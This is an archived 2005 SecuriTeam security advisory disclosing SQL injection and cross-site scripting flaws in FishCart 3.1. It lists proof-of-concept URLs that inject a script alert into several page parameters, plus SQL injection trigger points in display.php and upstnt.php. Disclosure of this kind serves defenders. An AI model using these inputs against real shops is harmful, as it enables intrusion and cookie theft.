[NEWS] FishCart SQL Injection and Cross Site Scripting Vulnerabilities

From: SecuriTeam (support_at_securiteam.com)
Date: 05/04/05

  • Next message: SecuriTeam: "[NT] NetWin DMail Authentication Bypass (dlist.exe) and Format String (dsmtp.exe)"
    To: list@securiteam.com
    Date: 4 May 2005 17:56:05 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      FishCart SQL Injection and Cross Site Scripting Vulnerabilities
    ------------------------------------------------------------------------

    SUMMARY

     <http://fishcart.org/> FishCart, in use since January 1998, is "a proven
    Open Source e-commerce system for products, services, online payment and
    online donation management. Written in PHP4, FishCart has been tested on
    Windows NT, Linux, and various UNIXplatforms. FishCart presently supports
    the MySQL, PostgreSQL, Solid, Oracle and MSSQL".

    The FishCart product has been found to contain multiple SQL injection and
    cross site scripting vulnerabilities.

    DETAILS

    Vulnerable Systems:
     * FishCart version 3.1

    Cross Site Scripting:
    Many of the pages used by FishCart are vulnerable to cross site scripting,
    the following URLs are some examples:
    http://example.com/display.php?cartid=&zid=1&lid=1
    &nlst='"><script>alert(document.cookie)</script>&olimit=0&cat=&key1=&psku=

    http://example.com/upstracking.php?trackingnum='">
    <script>alert(document.cookie)</script>&reqagree=checked&m=

    http://example.com/upstracking.php?trackingnum=
    &reqagree='"><script>alert(document.cookie)</script>&m=

    http://example.com/upstracking.php?trackingnum=
    &reqagree=checked&m='"><script>alert(document.cookie)</script>

    SQL Injection:
    The following two pages contain exploitable SQL injection vulnerabilities,
    teh following URLs can be used to trigger these vulnerabilities:
    http://example.com/display.php?cartid=&zid=1&lid=1
    &nlst=y&olimit=0&cat=&key1=&psku='SQL_INJECTION

    http://example.com/upstnt.php?zid=1&lid=1 &cartid='SQL_INJECTION

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:dcrab@hackerscenter.com>
    Diabolic Crab.
    The original article can be found at:
    <http://digitalparadox.org/viewadvisories.ah?view=38>
    http://digitalparadox.org/viewadvisories.ah?view=38

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


  • Next message: SecuriTeam: "[NT] NetWin DMail Authentication Bypass (dlist.exe) and Format String (dsmtp.exe)"

    Relevant Pages

    • [UNIX] Gregarius XSS and SQL Injection Vulnerabilities
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Gregarius XSS and SQL Injection Vulnerabilities ... The following URL can used to trigger a cross site scripting vulnerability ...
      (Securiteam)
    • [UNIX] Travelsized CMS Multiple Cross Site Scripting Issues
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Travelsized CMS Multiple Cross Site Scripting Issues ... Multiple cross site scripting vulnerabilities ...
      (Securiteam)
    • [UNIX] Multiple Vulnerabilities MetaDot Portal Server
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... SQL Injection: ... query he can cause an error message to execute script into an unsuspecting ... users browser thus causing a Cross Site Scripting attack. ...
      (Securiteam)
    • [UNIX] Multiple Vulnerabilities in Tutos (Cross Site Scripting, Path Disclosure, SQL Injection)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Cross Site Scripting: ... Multiple exploitable pages were found in Tutos that cause script execution ... These vulnerabilities would allow a remote user to determine the full path ...
      (Securiteam)
    • [UNIX] Multiple Vulnerabilities in phpWebLog (Cross Site Scripting, File Inclusion)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... The phpWebLog has been found to contain multiple vulnerabilities allowing ... a remote attacker to initiate cross site scripting attacks and cause the ...
      (Securiteam)